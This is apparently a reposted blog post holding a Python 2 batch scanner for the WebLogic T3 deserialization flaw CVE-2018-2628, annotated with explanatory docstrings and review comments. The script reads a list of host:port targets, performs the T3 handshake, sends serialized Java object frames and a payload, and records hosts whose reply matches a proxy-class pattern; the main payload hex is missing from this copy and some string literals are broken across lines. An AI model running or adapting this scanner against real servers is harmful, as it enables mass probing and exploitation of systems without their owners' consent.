  • weblogic反序列化漏洞CVE-2018-2628-批量检测脚本

    #coding=utf-8
    
    import socket
    import time
    import re,os,sys,codecs
    
    type = 'utf-8'  # codec name used by the .decode(type) calls below; NOTE: shadows the builtin `type`
    reload(sys)  # Python 2 only: `reload` is a builtin and sys.setdefaultencoding exists only after reload
    sys.setdefaultencoding(type)
    IpFile=file('./weblogic1.txt') # target list, one host:port per line (Python 2 `file` builtin; opened at import time)
    fp= codecs.open("./weblogic1_success.txt","a") # result file; append mode, so hits accumulate across runs; codecs.open so non-ASCII text can be written
    timeout=15  # socket timeout in seconds, applied in check() and relied on to end the read loop in sendEvilObjData()
    
    
    # The three lists below are indexed in parallel by the `index` argument of check().
    VUL=['CVE-2018-2628']  # label written into the result line
    PAYLOAD=['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']  # hex payload body; removed from this copy of the page
    VER_SIG=['\$Proxy[0-9]+']  # regex matched against the server's reply; a match is the sole "vulnerable" criterion
    
    def t3handshake(sock,server_addr):
        """Connect `sock` to `server_addr` and send the T3 protocol greeting.

        Args:
            sock: an unconnected TCP socket (created and given a timeout in check()).
            server_addr: (host, port) tuple.

        The hex sent below decodes to the plaintext T3 header lines
        `t3 12.2.1`, `AS:255`, `HL:19`, `MS:10000000` followed by a blank line;
        that greeting is what a network sensor sees at the start of any T3
        session. The reply (up to 1024 bytes) is read and discarded. Connection
        errors are not caught here; check() catches and reports them.
        """
        # NOTE(review): the print's string literal is split across two lines in this copy
        # of the page (extraction artifact); presumably it began with a newline escape.
        print '
    [*]正在连接服务器...'.decode(type)
        sock.connect(server_addr)
        sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))  # Python 2 'hex' codec: hex text -> raw bytes
        time.sleep(1)  # fixed wait before reading the greeting response
        sock.recv(1024)
    
    
    def buildT3RequestObject(sock,port,server_addr):
        """Send the serialized T3 request frames that precede the payload.

        Args:
            sock: connected socket after t3handshake().
            port: NOT used. data2 is built from the module-level `dport` that
                  check() assigns via `global dport`, so this function only
                  behaves as intended when called through check().
            server_addr: (host, port), used only for the status message.

        Returns:
            Length of the single reply read with recv(2048). 0 means the peer
            closed the connection (check() reports that as "not vulnerable");
            a socket timeout raises instead and is caught in check().

        data2 embeds the target port as four hex digits and contains `aced0005`,
        the Java serialization stream header: this is the point where serialized
        Java objects start flowing over the T3 connection, which is where
        deserialization filtering and network detection apply.
        """
        print '%s:%d连接成功,正在发送请求...'.decode(type) %(server_addr[0],server_addr[1])
        data1 = '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'  # hex frame; removed from this copy of the page
        data2 = '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{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))  # `dport` is the global set in check(), not the `port` parameter
        data3 = '1a7727000d3234322e323134'
        data4 = '2e312e32353461863d1d0000000078'
        for d in [data1,data2,data3,data4]:
            sock.send(d.decode('hex'))  # Python 2 'hex' codec: hex text -> raw bytes
        time.sleep(2)  # fixed wait for the server to answer
        date = len(sock.recv(2048))  # `date` is the reply length in bytes, not a date
        print '发送有效载荷请求成功,接收长度:%d'.decode(type) %(date)
        return date
    
    def sendEvilObjData(sock,data):
        """Wrap `data` (hex) in a length-prefixed T3 frame, send it, and collect the reply.

        Args:
            sock: connected socket after buildT3RequestObject().
            data: hex-encoded payload body (PAYLOAD[index] from check()).

        Returns:
            All bytes received until recv() raised -- normally the socket timeout
            set in check(); may be the empty string.

        The trailing hex literal contains `aced0005` (Java serialization stream
        header) followed by serialized weblogic.rjvm / weblogic.rmi request-context
        classes; the first 8 hex digits of the finished frame are its length.
        """
        print '正在执行payload,请稍等...'.decode(type)
        payload='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'  # hex prefix; removed from this copy of the page
        payload+=data
        payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
        # Length prefix: hex chars / 2 = byte count, + 4 for the 4-byte length field itself.
        # Python 2 int `/` is integer division, exact here as long as the hex has even length.
        payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
        sock.send(payload.decode('hex'))
        time.sleep(2)
        sock.send(payload.decode('hex'))  # the identical frame is sent a second time
        res = ''
        try:
            while True:
                # NOTE(review): this loop ends only when recv() raises. If the peer closes the
                # connection, recv() returns '' without raising and the loop never terminates.
                res += sock.recv(4096)
                time.sleep(0.1)
        except Exception as e:
            pass  # the socket timeout (or any other error) is the end-of-response signal; `e` is discarded
        return res
    
    def checkVul(res,server_addr,index):
        """Decide from the server's reply whether the host is reported as vulnerable.

        Args:
            res: raw bytes collected by sendEvilObjData().
            server_addr: (host, port) tuple for the messages and the result line.
            index: position into the parallel VUL / VER_SIG lists.

        Side effects:
            Prints the verdict and, on a match, appends "host:port 存在 <VUL> 漏洞."
            to the module-level result file `fp` and flushes it.

        The verdict is purely a regex match of VER_SIG[index] (`$Proxy<digits>`,
        the naming pattern of JDK dynamic-proxy classes) anywhere in the reply.
        Any response that happens to contain such a string counts as a hit, so
        the result file is an indicator list to be verified, not proof.
        """
        print '执行结果:'.decode(type)
        p=re.findall(VER_SIG[index], res, re.S)
        if len(p)>0:
            info='%s:%d 存在 %s 漏洞.' %(server_addr[0],server_addr[1],VUL[index])
            info=info.decode(type)
            print info
            # NOTE(review): the literal below is split across two lines in this copy of the
            # page (extraction artifact); presumably it was a newline escape ending the record.
            info=info+"
    "
            fp.write(info)
            fp.flush()  # flush per hit so partial results survive an aborted run
        else:
            print '%s:%d 不存在 %s 漏洞'.decode(type) % (server_addr[0],server_addr[1],VUL[index])
    
    
    def check(host,port,index):
        """Run the whole probe against one host:port and report the outcome.

        Args:
            host: target hostname or IP.
            port: target TCP port (int).
            index: position into VUL / PAYLOAD / VER_SIG.

        Flow: handshake -> request frames -> payload -> regex verdict, all on one
        socket bounded by the module-level `timeout`. Every failure is reported by
        printing a message; nothing is raised to the caller, and the socket is
        always closed in the finally clause.
        """
        dip=host
        global dport
        dport=port  # buildT3RequestObject() reads this global instead of its own `port` argument
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)  # also what terminates the read loop in sendEvilObjData()
        server_addr = (dip, dport)
        try:
            t3handshake(sock,server_addr)
        except Exception as e:
            print '%s:%d连接失败,请检查IP是否存活...'.decode(type) %(server_addr[0],server_addr[1])  # connect/handshake failed
        else:
            try:
                dateout = buildT3RequestObject(sock,dport,server_addr)
                if dateout == 0:
                    # empty reply to the request frames (peer closed) is reported as "not vulnerable"
                    print '%s:%d 不存在 %s 漏洞.'.decode(type) % (server_addr[0],server_addr[1],VUL[index])
                else:
                    rs=sendEvilObjData(sock,PAYLOAD[index])
                    # print 'rs',rs
                    checkVul(rs,server_addr,index)
            except Exception as e:
                # NOTE(review): catches every exception (timeouts, encoding errors, bugs) and
                # attributes all of them to "requests too frequent"; `e` is never shown.
                print '%s:%d请求频繁,请稍后自行单独测试...'.decode(type) %(server_addr[0],server_addr[1])
        finally:
            sock.close()
    
    
    if __name__=="__main__":
        # Entry point: read host:port targets from ./weblogic1.txt (opened at import as IpFile)
        # and run check() against each one with list index 0 (CVE-2018-2628).
        ip_list = []  # reassigned to [] again after the banner below
    
        print u'''
        ----------------------------------------------------------------------------------------
            程序名称:weblogic反序列化漏洞批量测试 CVE-2018-2628 weblogic_poc-cve-2018-2628.py
            程序作者:pt007@vip.sina.com
            程序用法:
        	weblogic1.txt里面设置需要扫描的IP地址,如:10.110.123.30:7001 回车后输入下一个IP地址!
        	python weblogic_poc-cve-2018-2628.py
        -----------------------------------------------------------------------------------------
    '''
        ip_list=[]
        print "[*]weblogic url list:",  # trailing comma: Python 2 print without newline
        while True:
            line = IpFile.readline()
            if len(line) == 0: # Zero length indicates EOF
                break
                #exit()             
            line=line.strip()  # blank lines are not skipped: "\n" has length 1, so an empty string is appended
            print line,
            ip_list.append(line)
        IpFile.close()
        # NOTE(review): the literal below is split across two lines in this copy of the
        # page (extraction artifact); presumably a newline escape.
        print "
    "
        for i in ip_list:
            # NOTE(review): a line without exactly one ':' (blank line, bare IP, IPv6 literal)
            # raises ValueError here and aborts the whole batch; int(port) likewise on a
            # non-numeric port. The result file `fp` is then left open.
            host,port=i.split(":")
            check(host,int(port),0)
        fp.close()
        print "[*]Test done,please type weblogic1_success.txt!
    "
  • 原文地址:https://www.cnblogs.com/hookjoy/p/8904276.html